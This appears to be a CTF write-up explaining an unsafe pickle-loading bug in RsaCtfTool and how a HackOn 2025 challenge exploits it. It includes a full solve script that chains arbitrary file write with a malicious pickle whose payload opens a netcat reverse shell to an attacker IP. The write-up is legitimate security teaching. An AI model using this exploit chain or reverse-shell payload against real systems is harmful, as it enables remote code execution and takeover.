On the weekend of 20 February, some friends and I organised the HackOn 2025 CTF. I was researching some libraries looking for bugs, in order to create the challenges, when I thought of checking RsaCtfTool: the tool that everyone on the CTF world has used and doesn’t know how it works.
RsaCtfTool Bug
The main purpose of this tool is to recover the private key from the RSA public params. It accepts multiple formats like PEM,DER or the literal values of the modulus and exponent. It also runs a bunch of attacks and, if any of them is successful, prints the private key.
While going through the files inside the lib folder, I noticed one called pickle.py. This contains two very simple functions: the first one, compress_pickle , receives by parameters a file name and a variable with data. Later, by means of the function cPickle.dump the serialization of the object is saved in a file in bytes and later compressed to bzip2.
import bz2
import pickle
import _pickle as cPickle
import sys
# Pickle a file and then compress it into a file with extension
def compress_pickle(filename, data):
sys.stderr.write("saving pickle %s...\n" % filename)
with bz2.BZ2File(filename, "w") as f:
cPickle.dump(data, f)
# Load any compressed pickle file
def decompress_pickle(filename):
sys.stderr.write("loading pickle %s...\n" % filename)
data = bz2.BZ2File(filename, "rb")
data = cPickle.load(data)
return dataOn the other hand, decompress_pickle decompresses a file and loads it using the function cPickle.load. which is vulnerable to arbitrary Python code execution.
Going deeper, a pickle-serialized object consists of a byte-stream representation of the object, structured with a series of opcodes and operands that dictate how it should be reconstructed. When this byte-stream is loaded, the function interprets the opcodes and executes them sequentially to rebuild the original object.
The key vulnerability lies in the __reduce__ method, which allows objects to define custom deserialization behavior letting us execute arbitrary code.
Knowing the potential exploitation vector, I searched for the function references. It is used in rapid7primes.py and implements an attack where some hardcoded primes are loaded, also checking if the modulus is divisible by any of this primes.
class Attack(AbstractAttack):
def __init__(self, timeout=60):
super().__init__(timeout)
self.speed = AbstractAttack.speed_enum["fast"]
def attack(self, publickey, cipher=[], progress=True):
"""Search for rapid7 gcd primes"""
for txtfile in glob.glob("data/*.pkl.bz2"):
self.logger.info(f"[+] loading prime list file {txtfile}...")
# primes = sorted([int(l.rstrip()) for l in open(txtfile,"r").readlines()])
primes = decompress_pickle(txtfile)
for prime in tqdm(primes, disable=(not progress)):
if is_divisible(publickey.n, prime):
publickey.q = prime
publickey.p = publickey.n // publickey.q
priv_key = PrivateKey(
int(publickey.p),
int(publickey.q),
int(publickey.e),
int(publickey.n),
)
return priv_key, None
return None, NoneThe attack loads the primes from all files that end with .pkl.bz2 and are in the data directory of the RsaCtfTool root source code root. Therefore, if we can write an arbitrary file to that specific path and the tool executes the rapid7primes attack, our file will be loaded and executed.
This bug has no real impact, except someone would hide a backdor as a malicious .pkl.bz2 file xD.
HackOn 2025 CTF Challenge Writeup
In the challenge, you have access to a web page where you can run the RsaCtfTool tool and mess with the parameters that are passed to it. The source code of the web logic is:
import subprocess, os
from flask import Flask, request, render_template, jsonify
app = Flask(__name__)
PARAMS_WHITELIST = ['--attack', '-n', '-e','-d','-p','-q', '--private', '--decrypt', '--verbosity', '--cleanup', '--isroca','--output', '--isconspicuous', '--check_publickey', '--timeout']
def sanitize_path(path):
return os.path.abspath(os.path.normpath(os.path.join("/", path)))
@app.route('/')
def index():
return render_template('index.html')
@app.route('/exec', methods=['POST'])
def exec_tool():
data = request.json
params = data.get('params', [])
if not params:
return jsonify({'error': 'No parameters provided'})
results = []
params_list = []
try:
for param in params:
param_name = param.get('param')
content = param.get('content')
if not param_name or not content:
return '[ERROR]: Missing parameter or content'
elif param_name not in PARAMS_WHITELIST:
return '[ERROR]: Invalid parameter'
params_list.append(param_name)
if param_name == '--output':
content = sanitize_path(content)
if os.path.exists(content) or not content.startswith('/opt'):
content = f"/opt/outputs/out_{os.urandom(8).hex()}.txt"
elif param_name == '--attack':
content = content.lower()
else:
content = str(int(content))
params_list.append(content)
except Exception as e:
return str(e)
try:
cmd = ['python3','/opt/RsaCtfTool/RsaCtfTool.py'] + params_list
print(cmd)
result = subprocess.check_output(cmd,cwd="/opt/RsaCtfTool", text=True, stderr=subprocess.STDOUT)
return result
except Exception as e:
return str(e)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000)Intended Challenge Solution
The exec endpoint recieves two values, a list of the parameters (params) and another with the value of each one (content). For each parameter, some checks are carried out and the output parameter is restricted to start with /opt string (also some path traversal sanitization is done).
Getting AFW
The first step in the exploit is to get arbitrary file write in the docker. We can achieve AFW by using one of RsaCtfTool’s features to decrypt a value and save it to a system file. This part is tricky because the tool uses openssl to decrypt the data that is supplied to the user, so the output is padded to the module size. Therefore, if we generate public and private keys with standard RSA sizes, the final file ends up corrupted.
To avoid this problem we can set the modulus size equal to the payload size in order to avoid the openssl padding at decryption.
Exploiting the bug
Next step is to exploit the bug explained in 1, the __reduce__ function returns a tuple between 2 and 6 elements. Following the docs:
- A callable object that will be called to create the initial version of the object.
- A tuple of arguments for the callable object. An empty tuple must be given if the callable does not accept any argument…
With the first argument we call to os.system and the second one is the argument passed to os.system, in my case a netcat reverse shell.
class Payload(object):
def __reduce__(self):
import os
return (os.system, (f'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {IP} {PORT} >/tmp/f',))Finally we create a small script to send the payload to the server and then trigger it by calling the rapid7primes.
Final Solve Script
import bz2
import _pickle as cPickle
import requests
from Crypto.Util.number import bytes_to_long, getPrime
url = 'http://hackon-0f38e1ddbb74-rsactftool-1.chals.io/exec'
IP="192.168.1.139"
PORT=7777
class Payload(object):
def __reduce__(self):
import os
return (os.system, (f'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {IP} {PORT} >/tmp/f',))
def gen_rsa_key(bits):
p = getPrime(bits // 2)
q = getPrime(bits // 2)
n = p * q
e = 0x10001
d = pow(e, -1, (p - 1) * (q - 1))
return n, e, d
def send_payload(N,d,ciphertext):
data = {
'params': [
{'param': '-n', 'content': str(N)},
{'param': '-d', 'content': str(d)},
{'param': '--decrypt', 'content': str(ciphertext)},
{'param': '--output', 'content': '/opt/RsaCtfTool/data/aaaaaaaa.pkl.bz2'}
]
}
response = requests.post(url, json=data)
print(response.text)
def trigger_payload():
data = {
'params': [
{'param': '-n', 'content': '85'},
{'param': '-e', 'content': '3'},
{'param': '--attack', 'content': 'rapid7primes'}
]
}
response = requests.post(url, json=data)
print(response.text)
if __name__ == '__main__':
payload = bytes_to_long(bz2.compress(cPickle.dumps(Payload())))
print(payload.bit_length())
N,e,d = gen_rsa_key(payload.bit_length() + 1)
c = pow(payload, e, N)
assert payload == pow(c, d, N)
print(f"N = {N}\nd = {d}\nc = {c}")
send_payload(N,d,c)
trigger_payload()